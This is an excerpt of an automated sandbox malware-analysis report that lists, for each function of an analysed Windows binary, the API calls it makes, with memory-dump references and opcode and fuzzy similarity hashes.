        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CreateDirectory$AttributesErrorFileLast
        • String ID:
        • API String ID: 2267087916-0
        • Opcode ID: 77399d0cdcd2381d19688757dc5d469c45d42475a8c6bbbc0efe3c71a10b5e54
        • Instruction ID: 9b155f56258634f69873ad9d51ec5aea7fe4cd6e02e9967a40f1a06c84e9089d
        • Opcode Fuzzy Hash: 77399d0cdcd2381d19688757dc5d469c45d42475a8c6bbbc0efe3c71a10b5e54
        • Instruction Fuzzy Hash: 1021BF705182029F8314DF38D88586EBBE4AF56324F204A9DF899C72A1D730DD56CF93
        APIs
          • Part of subcall function 00241014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0024102A
          • Part of subcall function 00241014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00241036
          • Part of subcall function 00241014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00241045
          • Part of subcall function 00241014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0024104C
          • Part of subcall function 00241014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00241062
        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002415BE
        • _memcmp.LIBVCRUNTIME ref: 002415E1
        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00241617
        • HeapFree.KERNEL32(00000000), ref: 0024161E
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
        • String ID:
        • API String ID: 1592001646-0
        • Opcode ID: 201d53d0fa539db93f47ddd1d218bc25280798cf865fe00913457c29d4f0f5fb
        • Instruction ID: 7fb285ccbff27c846c853e7fc8595e292a335c304efa1f0fcec7ea997860106d
        • Opcode Fuzzy Hash: 201d53d0fa539db93f47ddd1d218bc25280798cf865fe00913457c29d4f0f5fb
        • Instruction Fuzzy Hash: 1D21A171E10109EFDF08DFA4C949BEEB7B8EF44344F194459E445AB241D730EAA5CB90
        APIs
        • GetWindowLongW.USER32(?,000000EC), ref: 0027280A
        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00272824
        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00272832
        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00272840
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$Long$AttributesLayered
        • String ID:
        • API String ID: 2169480361-0
        • Opcode ID: 47606a291624e60a1c9d0f9eab46ae7fa5b227651471da3444e454de48e0ba4e
        • Instruction ID: 71d361fcb6949f4ca40b50c062baded40caa659a90e662088e3b1dc4c8dee5f0
        • Opcode Fuzzy Hash: 47606a291624e60a1c9d0f9eab46ae7fa5b227651471da3444e454de48e0ba4e
        • Instruction Fuzzy Hash: 6021C431214511EFD7149F24D844F6ABB95EF45324F24815CF42A8B6D2C772FC96CB91
        APIs
          • Part of subcall function 00248D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0024790A,?,000000FF,?,00248754,00000000,?,0000001C,?,?), ref: 00248D8C
          • Part of subcall function 00248D7D: lstrcpyW.KERNEL32(00000000,?,?,0024790A,?,000000FF,?,00248754,00000000,?,0000001C,?,?,00000000), ref: 00248DB2
          • Part of subcall function 00248D7D: lstrcmpiW.KERNEL32(00000000,?,0024790A,?,000000FF,?,00248754,00000000,?,0000001C,?,?), ref: 00248DE3
        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00248754,00000000,?,0000001C,?,?,00000000), ref: 00247923
        • lstrcpyW.KERNEL32(00000000,?,?,00248754,00000000,?,0000001C,?,?,00000000), ref: 00247949
        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00248754,00000000,?,0000001C,?,?,00000000), ref: 00247984
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: lstrcmpilstrcpylstrlen
        • String ID: cdecl
        • API String ID: 4031866154-3896280584
        • Opcode ID: 50826acd21d35d9137f8921ca782d628b44e6f03981adff45b8fd21beb216254
        • Instruction ID: 0225222e4c22d189a8b910a4ee64508c1a655dcbe655485394ba2303c02c5077
        • Opcode Fuzzy Hash: 50826acd21d35d9137f8921ca782d628b44e6f03981adff45b8fd21beb216254
        • Instruction Fuzzy Hash: 4111E63A210342ABCB199F38D849D7B77A9FF95350B50402EF94AC72A4EF719861C7A1
        APIs
        • GetWindowLongW.USER32(?,000000F0), ref: 00277D0B
        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00277D2A
        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00277D42
        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0025B7AD,00000000), ref: 00277D6B
          • Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$Long
        • String ID:
        • API String ID: 847901565-0
        • Opcode ID: c818074d84524ade7d5202bfcb361da257bbd6a6d942d9540a418b75c9cd572e
        • Instruction ID: 7f1995c8062583a4bb3eb4bcc566b869e8de684572ed7df8f2ce12cc4ec401dc
        • Opcode Fuzzy Hash: c818074d84524ade7d5202bfcb361da257bbd6a6d942d9540a418b75c9cd572e
        • Instruction Fuzzy Hash: 2711A231524656AFCB209F68DC08AA63BA5AF45360B658728F83DD72F0D73199B0CB90
        APIs
        • SendMessageW.USER32(?,00001060,?,00000004), ref: 002756BB
        • _wcslen.LIBCMT ref: 002756CD
        • _wcslen.LIBCMT ref: 002756D8
        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00275816
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend_wcslen
        • String ID:
        • API String ID: 455545452-0
        • Opcode ID: 863314a291853bb11df4e4d339726ee41be71d65af4ef41f1867b5359a115075
        • Instruction ID: e98f89db0aaf5a23700c8fae33596e65172978ae70801a73e69f0a98c0b14a2f
        • Opcode Fuzzy Hash: 863314a291853bb11df4e4d339726ee41be71d65af4ef41f1867b5359a115075
        • Instruction Fuzzy Hash: 9D11D671A2062996DB209F61DC85AEEB76CFF11760F50C02AFA1DD6081E7F0D9A4CF60
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 852364c4443ea38f5a7b53a78bb82d828e66a127f28c5a4cbaf25d3e41b6e066
        • Instruction ID: 88905e31034c9227e020a6c91c913ce3df05517ec8aa85de2d5a79751af55279
        • Opcode Fuzzy Hash: 852364c4443ea38f5a7b53a78bb82d828e66a127f28c5a4cbaf25d3e41b6e066
        • Instruction Fuzzy Hash: E201A2B222961B7EF7112A787CC5FA7669CDF617B8B300329F625511D2DB708CB08570
        APIs
        • SendMessageW.USER32(?,000000B0,?,?), ref: 00241A47
        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00241A59
        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00241A6F
        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00241A8A
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend
        • String ID:
        • API String ID: 3850602802-0
        • Opcode ID: 536537075adeba94301104a3373fdff578011f1c25b28de84cc7d18b54d8a844
        • Instruction ID: 56900116b5cc66aed54fb0cabde2562ad2707fed74a97057d40b98c24d711274
        • Opcode Fuzzy Hash: 536537075adeba94301104a3373fdff578011f1c25b28de84cc7d18b54d8a844
        • Instruction Fuzzy Hash: 08117C3AD01229FFEB10DBA4CD84FADBB78EB04350F200091E600B7290C6716E60DB94
        APIs
        • GetCurrentThreadId.KERNEL32 ref: 0024E1FD
        • MessageBoxW.USER32(?,?,?,?), ref: 0024E230
        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0024E246
        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0024E24D
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
        • String ID:
        • API String ID: 2880819207-0
        • Opcode ID: 1068ea52b5198ace467a7ef81735ee670e9a79e7919a563717aa5f4d19de9c49
        • Instruction ID: 200a4bade8adaedac63aae42ea7c030fdf3c77943b561df095d088ec87f5bb1f
        • Opcode Fuzzy Hash: 1068ea52b5198ace467a7ef81735ee670e9a79e7919a563717aa5f4d19de9c49
        • Instruction Fuzzy Hash: 3B11E172914214ABDB05DFB8AC09AAA7BACAB45320F514369FD29E3291D6B08D1087A0
        APIs
        • CreateThread.KERNEL32(00000000,?,0020CFF9,00000000,00000004,00000000), ref: 0020D218
        • GetLastError.KERNEL32 ref: 0020D224
        • __dosmaperr.LIBCMT ref: 0020D22B
        • ResumeThread.KERNEL32(00000000), ref: 0020D249
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Thread$CreateErrorLastResume__dosmaperr
        • String ID:
        • API String ID: 173952441-0
        • Opcode ID: f6c82ab4c7ee7a90cd84684985e2752006229163ec60b07dba125164d8ad96a8
        • Instruction ID: f248f761cc44c85efa7e65e7ede7c675f879981fbc0c617e5b8617b44f8eebcd
        • Opcode Fuzzy Hash: f6c82ab4c7ee7a90cd84684985e2752006229163ec60b07dba125164d8ad96a8
        • Instruction Fuzzy Hash: F901C436426305BFD7216FF5DC09BAA7A69DF81730F200219FD29961D2CF7089618AA0
        APIs
        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001E604C
        • GetStockObject.GDI32(00000011), ref: 001E6060
        • SendMessageW.USER32(00000000,00000030,00000000), ref: 001E606A
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CreateMessageObjectSendStockWindow
        • String ID:
        • API String ID: 3970641297-0
        • Opcode ID: 44ffbdcd7288078bea5d4c8b23aa535f70cb4bb220996971203e877613b132e2
        • Instruction ID: 831651233c0b1fd7833c3aa1efca1dc1e2cd5d1bc1e6e6aa1a5e064c399737f7
        • Opcode Fuzzy Hash: 44ffbdcd7288078bea5d4c8b23aa535f70cb4bb220996971203e877613b132e2
        • Instruction Fuzzy Hash: B011A172101958BFEF165FA59C48EEEBB6DEF183A4F500215FA0452010C736ACA0DB90
        APIs
        • ___BuildCatchObject.LIBVCRUNTIME ref: 00203B56
          • Part of subcall function 00203AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00203AD2
          • Part of subcall function 00203AA3: ___AdjustPointer.LIBCMT ref: 00203AED
        • _UnwindNestedFrames.LIBCMT ref: 00203B6B
        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00203B7C
        • CallCatchBlock.LIBVCRUNTIME ref: 00203BA4
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
        • String ID:
        • API String ID: 737400349-0
        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
        • Instruction ID: 2afed227d9d5d13f55b9eb5217e466f522ad7100fb394624e59c67db20acdbf0
        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
        • Instruction Fuzzy Hash: 13012972110249BBDF12AE95CC42EEB3B6EEF88758F048414FE4856162C732E971DFA0
        APIs
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00250832,00000000,00000000,?,0021301A,00250832,00000000,00000000,00000000,?,0021328B,00000006,FlsSetValue), ref: 002130A5
        • GetLastError.KERNEL32(?,0021301A,00250832,00000000,00000000,00000000,?,0021328B,00000006,FlsSetValue,00282290,FlsSetValue,00000000,00000364,?,00212E46), ref: 002130B1
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0021301A,00250832,00000000,00000000,00000000,?,0021328B,00000006,FlsSetValue,00282290,FlsSetValue,00000000), ref: 002130BF
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: LibraryLoad$ErrorLast
        • String ID:
        • API String ID: 3177248105-0
        • Opcode ID: 28f82d8de8c11702d489765979e9964114370c85fb4e05776e2ffc7d390aec48
        • Instruction ID: a3c998a2bfa7176f8fb1ad8b139f6a00000438a30609060063e3ccd99b1d414a
        • Opcode Fuzzy Hash: 28f82d8de8c11702d489765979e9964114370c85fb4e05776e2ffc7d390aec48
        • Instruction Fuzzy Hash: 0901D832331623ABC7218E79AC489977BD99F59761B210634F909E3140DB21D991C7E0
        APIs
        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0024747F
        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00247497
        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002474AC
        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 002474CA
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Type$Register$FileLoadModuleNameUser
        • String ID:
        • API String ID: 1352324309-0
        • Opcode ID: 3b1beaea7a128dc51b6c3d52e1912a0e33eb89dde6a64422d73f94a21f6f12b0
        • Instruction ID: c53c4e21ceb3c25d67f70deb2c3c71203dc9e02b362ed981fd8f37730d15a688
        • Opcode Fuzzy Hash: 3b1beaea7a128dc51b6c3d52e1912a0e33eb89dde6a64422d73f94a21f6f12b0
        • Instruction Fuzzy Hash: 0411A1B52153119BF7208F24EC0CBA37BFCEB00B00F10856DA62AD6151D7B0E954DBA0
        APIs
        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0024ACD3,?,00008000), ref: 0024B0C4
        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0024ACD3,?,00008000), ref: 0024B0E9
        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0024ACD3,?,00008000), ref: 0024B0F3
        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0024ACD3,?,00008000), ref: 0024B126
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CounterPerformanceQuerySleep
        • String ID:
        • API String ID: 2875609808-0
        • Opcode ID: ebacbda30854af48f78ec15881ba3df809babe539ed432f7b18b6300cc164f9b
        • Instruction ID: bb5a5a2c7e28396b33a94c6e6b3ea6f150d98914607327a8d010f481e3baab61
        • Opcode Fuzzy Hash: ebacbda30854af48f78ec15881ba3df809babe539ed432f7b18b6300cc164f9b
        • Instruction Fuzzy Hash: FF116D31C2152DE7CF09AFE4E9586EEBB78FF09711F104099D949B6181CB709660CB51
        APIs
        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00242DC5
        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00242DD6
        • GetCurrentThreadId.KERNEL32 ref: 00242DDD
        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00242DE4
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
        • String ID:
        • API String ID: 2710830443-0
        • Opcode ID: dca97081fb6a77865ddf732d84b4b4af608b596ff3b973345b075200331bf12c
        • Instruction ID: a0ae8596ab72ea48bb597b62ec9b4b6f4897f5a6aa3ac47b181427d7928ad1b4
        • Opcode Fuzzy Hash: dca97081fb6a77865ddf732d84b4b4af608b596ff3b973345b075200331bf12c
        • Instruction Fuzzy Hash: 34E06D71511225FAD7242B73AC4EEEB7E6CEB83BA1F900029F109D10809AA48884C6B0
        APIs
          • Part of subcall function 001F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001F9693
          • Part of subcall function 001F9639: SelectObject.GDI32(?,00000000), ref: 001F96A2
          • Part of subcall function 001F9639: BeginPath.GDI32(?), ref: 001F96B9
          • Part of subcall function 001F9639: SelectObject.GDI32(?,00000000), ref: 001F96E2
        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00278887
        • LineTo.GDI32(?,?,?), ref: 00278894
        • EndPath.GDI32(?), ref: 002788A4
        • StrokePath.GDI32(?), ref: 002788B2
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
        • String ID:
        • API String ID: 1539411459-0
        • Opcode ID: d93793f2f49fc3f8be0e9fbb42c48cc64209359f99166b623ac0aea5b79b3710
        • Instruction ID: a5d2181d7681f543b03cfa994d0874ec238efe1c8709c75be2b6699ff1c6ab4f
        • Opcode Fuzzy Hash: d93793f2f49fc3f8be0e9fbb42c48cc64209359f99166b623ac0aea5b79b3710
        • Instruction Fuzzy Hash: FAF03A36041699BADB126FA4AC0DFCA3E59AF06310F548104FA15650E1C7755561CBE5
        APIs
        • GetSysColor.USER32(00000008), ref: 001F98CC
        • SetTextColor.GDI32(?,?), ref: 001F98D6
        • SetBkMode.GDI32(?,00000001), ref: 001F98E9
        • GetStockObject.GDI32(00000005), ref: 001F98F1
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Color$ModeObjectStockText
        • String ID:
        • API String ID: 4037423528-0
